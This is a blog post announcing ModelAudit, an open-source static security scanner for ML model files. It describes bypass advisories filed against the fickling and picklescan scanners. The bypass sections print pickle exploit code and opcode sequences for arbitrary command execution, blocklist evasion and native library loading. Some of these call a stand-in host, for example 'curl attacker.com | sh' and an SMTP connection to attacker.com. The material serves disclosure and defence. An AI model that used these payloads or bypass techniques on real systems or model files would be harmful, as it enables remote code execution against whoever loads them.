Open-Sourcing ModelAudit: Security Scanner for ML Model Files
Before joining Promptfoo, I worked on model scanning at Databricks. Teams pulled models from public registries, ran torch.load(), and treated the artifact like inert data. Model files are executable at load time.
Since joining Promptfoo last September, I've been building ModelAudit, a static security scanner for ML model files. We filed 7 GHSAs against existing scanners, including a CVSS 10.0 universal bypass, and validated against thousands of real models with zero false positives. Last week we released it as an MIT-licensed open-source project.
ModelAudit at a glance
ModelAudit is a static scanner for ML model files. It flags unsafe loading behaviors (deserialization RCE, archive tricks), known CVEs, and suspicious artifacts across 42+ formats, without executing the model or importing ML frameworks.
ModelAudit is the open-source engine (Python, MIT). promptfoo scan-model is a CLI wrapper; you can also run modelaudit scan directly.
pip install modelaudit
modelaudit scan your_model.pkl
The scanning engine runs entirely offline - it never loads or executes the model.
Example output
Scanning suspicious_model.pkl...
📊 SCAN SUMMARY
Files: 1 | Duration: 0.29s
Security Checks: ✅ 12 passed / ❌ 3 failed
🔍 SECURITY FINDINGS
🚨 2 Critical | ⚠️ 1 Warning
└─ 🚨 [suspicious_model.pkl (pos 45)]
Found REDUCE opcode with non-allowlisted global: posix.system
Why: The REDUCE opcode calls a callable with arguments, effectively
executing arbitrary Python functions. This is the primary
mechanism for pickle-based code execution attacks.
opcode: REDUCE
associated_global: posix.system (os.system on Unix)
└─ ⚠️ [suspicious_model.pkl]
Model affected by CVE-2025-32434 (PyTorch weights_only bypass)
severity: CRITICAL
affected_versions: torch<2.6.1
remediation: Upgrade to torch>=2.6.1
❌ CRITICAL SECURITY ISSUES FOUND
Capabilities:
- Formats: PyTorch, pickle, Keras, ONNX, TensorFlow, GGUF, CoreML, LightGBM, and 34+ more
- Output: Text, JSON, SARIF for CI/CD integration
- Extras: SBOM generation, license detection, secret scanning
- Remote pulls: S3, GCS, Hugging Face Hub, MLflow, JFrog, DVC
# Scan from Hugging Face
modelaudit scan hf://microsoft/DialoGPT-medium
# SARIF output for GitHub Code Scanning / GitLab SAST
modelaudit scan model.pt --format sarif --output results.sarif
# Via the Promptfoo CLI wrapper (requires Node)
npx promptfoo scan-model model.pt
Python 3.10–3.13. Linux, macOS, Windows. No ML framework dependencies.
Who this is for: Platform and AppSec teams that gate model artifacts in CI/CD, and anyone pulling models from public registries or running third-party checkpoints.
Model files execute code at load time
When you pip install a package, you probably run it through a dependency scanner. Most teams do nothing equivalent when they download a model from Hugging Face and call torch.load().
In pickle, __reduce__ defines what gets executed during unpickling:
import pickle, os
class Exploit(object):
def __reduce__(self):
return (os.system, ("touch /tmp/pwned",))
# When loaded via pickle.loads() or torch.load(),
# os.system() executes the command.
payload = pickle.dumps(Exploit())
JFrog found roughly 100 models on Hugging Face containing similar payloads. Those were the obvious ones - flagged and removed.
During our last batch of refinement for ModelAudit, we stumbled across models that we caught true positives on that bypass every other scanner in Hugging Face's pipeline:
Rammadaeus/tflite-flex-bypass-poc - A TFLite file with 4 malicious custom operators: FlexWriteFile (write arbitrary files), FlexReadFile (read arbitrary files), FlexPrintV2 (output exfiltration), and EagerPyFunc (arbitrary Python execution).
Every scanner in Hugging Face's pipeline misses this one - VirusTotal, JFrog, ClamAV report no issue, and picklescan and ModelScan don't support TFLite at all. ModelAudit catches all four malicious operators.
0xnu/mnist-ocr - The mnist_tokenizer.pkl file contains __main__.ImageTokenizer instantiated via the NEWOBJ opcode, a deserialization vector that executes arbitrary code on load.
Only ClamAV flags it, and only via signature matching, not structural analysis. VirusTotal, JFrog, and ModelScan all miss it.
NewstaR/GPTagalog - A 396 MB GPT model for Tagalog. The model-01.pkl file uses torch.storage._load_from_bytes via the REDUCE opcode (21 instances) and loads classes from __main__ scope - the same deserialization pattern used in pickle-based attacks.
VirusTotal, JFrog, and ModelScan all miss it. Only ClamAV flags it via signature matching - not structural analysis. ModelAudit catches the dangerous deserialization pattern.
Freakhobbies/Model-01.pkl - A 7.6 MB PyTorch GPT model with the same pattern: torch.storage._load_from_bytes via REDUCE and __main__ class references.
JFrog and ModelScan report no issue. Picklescan flags suspicious imports but only as informational. ClamAV catches it via signature. ModelAudit reports CRITICAL.
Hugging Face hosts over two million models. Most organizations pull from public registries without scanning what they download.
How we got here
Building at Promptfoo
When I joined Promptfoo, the team was building AI red teaming and code scanning capabilities. We could test how an LLM application behaves at runtime, but had no visibility into whether the models themselves were safe to load. If a model file triggers code execution on deserialization, runtime defenses don't matter. The compromise happens before the application starts.
The team had already built an early version of the scanner with the core architecture in place. When I joined, we expanded it significantly - adding opcode-level bypass detection, growing format coverage to the 42+ formats we support today, and introducing an allowlist-first approach with systematic false positive elimination. The goal was a modern, lightweight scanner with no ML framework dependencies - something you could drop into any CI pipeline without pulling in PyTorch or TensorFlow.
The false positive problem
Every ML framework serializes models differently. The same scikit-learn RandomForest saved with joblib vs pickle vs skops produces different opcode sequences. Upgrading Python or library versions changes which opcodes appear. An allowlist-based scanner that works on Python 3.10 might flag clean models on 3.13. And that's just pickle - every format we added had its own version of this problem: ONNX models with legitimate external data references tripping path traversal checks, Keras archives with custom layer configs that look like code injection, GGUF metadata fields that resemble suspicious strings.
We ran several rounds of false positive elimination against real Hugging Face models across every supported format. Each round surfaced new edge cases - legitimate patterns that looked suspicious to heuristic checks. We fixed them all.
The maturity milestone: 1,000+ models scanned across 14 formats, 5,000+ security checks, zero false positives on the final 100-model regression run. Since then, we've expanded to 42+ formats with 12 new scanners and validated against an additional 200+ models - all clean. That result triggered the open-source decision.
ModelAudit started as an internal capability within the Promptfoo platform (promptfoo.dev/model-security). Today's release is the standalone extraction of that scanning engine.
Existing scanners and where they break
Picklescan is integrated into Hugging Face's scanning pipeline and is fast and practical at scale. Fickling by Trail of Bits can decompile pickle streams into readable Python and recently added an allowlist-based scanner. ModelScan by ProtectAI covers Pickle, PyTorch, Keras (H5 and V3), TensorFlow SavedModel, NumPy, and Joblib; ProtectAI's commercial offering Guardian extends to 35+ formats. Safetensors takes the strongest approach: eliminate executable code from the format entirely. If you can use safetensors, you should. But roughly 45% of popular Hugging Face models still use pickle (CCS 2025), and the conversion pipeline itself can be a target.
The common weakness across blocklist-based scanners is architectural: maintain a list of known-dangerous functions and allow everything else through. An attacker only needs to find one function not on the list. Fickling has 12 published GHSAs. Picklescan has 60+. JFrog found 3 zero-day bypasses in picklescan (CVE-2025-10155/10156/10157, CVSS 9.3 each). Sonatype found 4 more (CVE-2025-1716, CVE-2025-1889, CVE-2025-1944, CVE-2025-1945). We reported seven of our own.
Building ModelAudit meant studying the pickle VM closely: how its ~68 opcodes chain together across protocol versions 0–5, how function calls get resolved, and where the gaps are in static analysis. That work kept turning up bypasses in existing scanners.
Fickling bypasses
We reported four GHSAs against fickling, all fixed by Trail of Bits.
GHSA-5hwf-rc88-82xm - Missing RCE-capable modules in UNSAFE_IMPORTS. At least 3 stdlib modules that provide direct arbitrary command execution were not blocked: uuid, _osx_support, and _aix_support. These modules contain functions that internally call subprocess.Popen() or os.system() with attacker-controlled arguments. Despite the platform-specific names, all three are importable on every platform:
# Pickle opcodes:
STACK_GLOBAL uuid _get_command_stdout # not in UNSAFE_IMPORTS
SHORT_BINUNICODE "curl"
SHORT_BINUNICODE "http://attacker.com"
TUPLE2
REDUCE # uuid._get_command_stdout("curl", "http://attacker.com")
# → subprocess.Popen(("curl", "http://..."), stdout=PIPE)
# fickling: LIKELY_SAFE
Trail of Bits fixed this in fickling 0.1.9.
GHSA-mxhj-88fx-4pcv (CVSS 8.6) - OBJ opcode invisibility. Fickling's OBJ opcode handler pushed function calls onto the interpreter stack without saving them to the AST. Discard the result with POP and the call vanishes from fickling's analysis entirely:
# Pickle opcodes:
OBJ(os.system, "curl attacker.com | sh") # call happens at load time
POP # result discarded from stack
# → call vanishes from AST, fickling reports LIKELY_SAFE
A pickle could spawn a reverse shell and fickling would report LIKELY_SAFE.
CVE-2026-22609 - Missing unsafe imports. My teammate Michael D'Angelo found that fickling's unsafe-imports list was missing high-risk standard library modules including ctypes, importlib, and multiprocessing. A pickle importing ctypes.CDLL to load a shared library passed as safe:
# Pickle opcodes (simplified):
GLOBAL ctypes CDLL # loads ctypes.CDLL
MARK
SHORT_BINUNICODE "./payload.so" # path to attacker's shared library
TUPLE
REDUCE # ctypes.CDLL("./payload.so") → loads and executes native code
# fickling: SAFE (ctypes not in unsafe-imports list)
Trail of Bits patched this in fickling 0.1.7.
GHSA-mhc9-48gj-9gp3 - Incomplete blocklist missing network and system unsafe imports. Fickling's likely_safe_imports set included all stdlib modules, so dangerous modules like smtplib, socketserver, signal, and sqlite3 were treated as safe. A pickle calling socketserver.TCPServer to open a backdoor listener or smtplib.SMTP to exfiltrate data passed all five safety interfaces:
# Pickle opcodes:
STACK_GLOBAL smtplib SMTP # stdlib module - added to likely_safe_imports
SHORT_BINUNICODE "attacker.com"
TUPLE1
REDUCE # smtplib.SMTP("attacker.com") → opens TCP connection
# → fickling: LIKELY_SAFE (smtplib is stdlib, skipped by OvertlyBadEvals)
Trail of Bits fixed this in fickling 0.1.8.
Picklescan bypasses
On March 3, 2026, we published three GHSAs against picklescan.
GHSA-vvpj-8cmc-gx39 (CVSS 10.0) - pkgutil.resolve_name universal blocklist bypass. pkgutil.resolve_name() is a Python stdlib function that resolves any "module:attribute" string to the actual Python object at runtime. A malicious pickle uses it as the REDUCE callable to obtain a reference to any blocked function - os.system, builtins.exec, anything - without that function's name appearing in the pickle opcodes:
# Pickle opcodes (simplified):
GLOBAL pkgutil resolve_name # not blocked by picklescan
MARK
SHORT_BINUNICODE "os:system" # the actual target, passed as data
TUPLE
REDUCE # pkgutil.resolve_name("os:system") → os.system
# picklescan sees: pkgutil.resolve_name → CLEAN
# actual effect: os.system obtained, ready to call with arbitrary arguments
The blocklist never sees os.system. It only sees pkgutil.resolve_name, which is not blocked. One opcode sequence bypasses the entire blocklist.
GHSA-g38g-8gr9-h9xp (CVSS 9.8) - Multiple stdlib modules with direct RCE not in blocklist. At least 7 Python stdlib modules that provide direct command execution or code evaluation were not blocked: codeop, code, compileall, py_compile, runpy, profile, and pdb. A malicious pickle importing any of these modules reports 0 issues:
# Pickle opcodes:
GLOBAL codeop compile_command # compiles arbitrary Python source into executable code objects
MARK
SHORT_BINUNICODE "import os; os.system('curl attacker.com | sh')"
TUPLE
REDUCE
# picklescan: CLEAN (codeop not in blocklist)
GHSA-7wx9-6375-f5wh (CVSS 9.8) - profile.run() blocklist mismatch. Picklescan blocks profile.Profile.run and profile.Profile.runctx but not the module-level profile.run() function. The blocklist entry Profile.run doesn't match the pickle global name run. profile.run(statement) calls exec() internally:
# Pickle opcodes:
GLOBAL profile run # module-level function, not Profile.run
MARK
SHORT_BINUNICODE "os.system('id')" # arbitrary Python statement
TUPLE
REDUCE # profile.run("os.system('id')") → exec() internally
# picklescan blocklist has: profile.Profile.run ← doesn't match "run"
# picklescan result: CLEAN
Each gap existed because the blocklist hadn't enumerated that specific entry yet. This is what it means for blocklist-based scanning to be reactive.
Trail of Bits and the picklescan maintainers fixed these quickly. The pickle VM is adversarial territory, and every scanner that operates there will have gaps. We follow coordinated disclosure for all findings and publish POCs as test cases, not weaponized attacks.
ModelAudit is the widest-coverage open-source scanner available, with format-specific analysis across 42+ formats, built-in CVE detection rules, and SARIF output for CI/CD integration. In a head-to-head comparison against ModelScan, ModelAudit detected 16 issues across 11 test files vs ModelScan's 3. Our team has contributed 7 GHSAs across fickling and picklescan. Teams already using picklescan or ModelScan can run ModelAudit alongside them; SARIF results from multiple scanners aggregate in the same CI pipeline.
Format coverage comparison
The most meaningful way to compare scanners is format by format. Here is what each open-source tool covers (March 2026; see each project's repository for current status):
| Format | picklescan | Fickling | ModelScan | ModelAudit |
|---|---|---|---|---|
| Pickle (.pkl/.pickle) | Yes | Yes | Yes | Yes |
| Dill (.dill) | - | - | Yes | Yes |
| PyTorch (.pt/.pth/.bin) | Yes | .pt/.pth | Yes | Yes |
| Joblib (.joblib) | Yes | - | Yes | Yes |
| Skops (.skops) | - | - | - | Yes |
| NumPy (.npy/.npz) | Yes | - | .npy only | Yes |
| Keras H5 (.h5/.hdf5) | - | - | Yes | Yes |
| Keras ZIP (.keras) | - | - | Yes | Yes |
| TensorFlow SavedModel (.pb) | - | - | Yes | Yes |
| TF MetaGraph (.meta) | - | - | - | Yes |
| ONNX (.onnx) | - | - | - | Yes |
| SafeTensors (.safetensors) | - | - | - | Yes |
| GGUF/GGML | - | - | - | Yes |
| JAX/Flax (.msgpack/.orbax) | - | - | - | Yes |
| JAX Checkpoint (.ckpt) | - | - | - | Yes |
| TFLite (.tflite) | - | - | - | Yes |
| ExecuTorch (.pte) | - | - | - | Yes |
| TensorRT (.plan/.engine) | - | - | - | Yes |
| PaddlePaddle (.pdmodel) | - | - | - | Yes |
| OpenVINO (.xml/.bin) | - | - | - | Yes |
| CoreML (.mlmodel/.mlpackage) | - | - | - | Yes |
| MXNet (.params/-symbol.json) | - | - | - | Yes |
| CatBoost (.cbm) | - | - | - | Yes |
| LightGBM (.lgb/.txt/.model) | - | - | - | Yes |
| XGBoost (.bst/.model/.ubj) | - | - | - | Yes |
| RKNN (.rknn) | - | - | - | Yes |
| Torch7 (.t7/.th) | - | - | - | Yes |
| Llamafile (.llamafile) | - | - | - | Yes |
| R Serialized (.rds/.rda) | - | - | - | Yes |
| CNTK (.cntk/.dnn) | - | - | - | Yes |
| PMML (.pmml) | - | - | - | Yes |
| TorchServe MAR (.mar) | - | - | - | Yes |
| Jinja2 Templates (.jinja/.j2) | - | - | - | Yes |
| OCI/Docker Layers (.manifest) | - | - | - | Yes |
| Weight Distribution Analysis | - | - | - | Yes |
| Compressed (.gz/.bz2/.xz/.zst) | - | - | - | Yes |
| ZIP archives (.zip/.npz) | Yes | - | Yes | Yes |
| TAR archives (.tar/.tar.gz) | - | - | - | Yes |
| 7-Zip archives (.7z) | Optional | - | - | Yes |
| Config (JSON/YAML/XML/TOML) | - | - | - | Yes |
| Total format categories | ~4 | ~2 | ~8 | 42+ |
Counts reflect distinct model format categories, not file extensions. All three tools are open source - see each repository for current status.
- picklescan: Pickle, PyTorch, NumPy, Joblib, plus archive support
- Fickling: Pickle, PyTorch (extension-agnostic, operates on pickle byte streams)
- ModelScan: Pickle/Dill/Cloudpickle, PyTorch, Keras H5, Keras V3, TF SavedModel, NumPy (.npy only - .npz not yet implemented), Joblib, plus ZIP support
| Capability | picklescan | Fickling | ModelScan | ModelAudit |
|---|---|---|---|---|
| CVE detection rules | No | No | No | Yes |
| SARIF output | No | No | No | Yes |
| SBOM generation | No | No | No | Yes |
| Secret scanning | No | No | No | Yes |
| License detection | No | No | No | Yes |
| Remote pulls (S3/GCS/HF) | HF/URL | No | No | Yes (S3/GCS/HF/R2/MLflow) |
| Allowlist approach | Partial | Yes | No | Yes |
| No ML framework deps | Yes | Yes | No | Yes |
ModelAudit is not a replacement for these tools - they've all contributed to making this space better.
Get started
The entire scanning engine is in the open-source repository. All scanners, all CVE detection rules, all output formats.
pip install modelaudit
modelaudit scan your_model.pkl
If you find a bypass, we follow coordinated disclosure and will credit you.
Promptfoo also offers ModelAudit with a hosted UI and managed integrations in the platform. The engine is the same open-source code.
Open issues on GitHub or reach out directly.
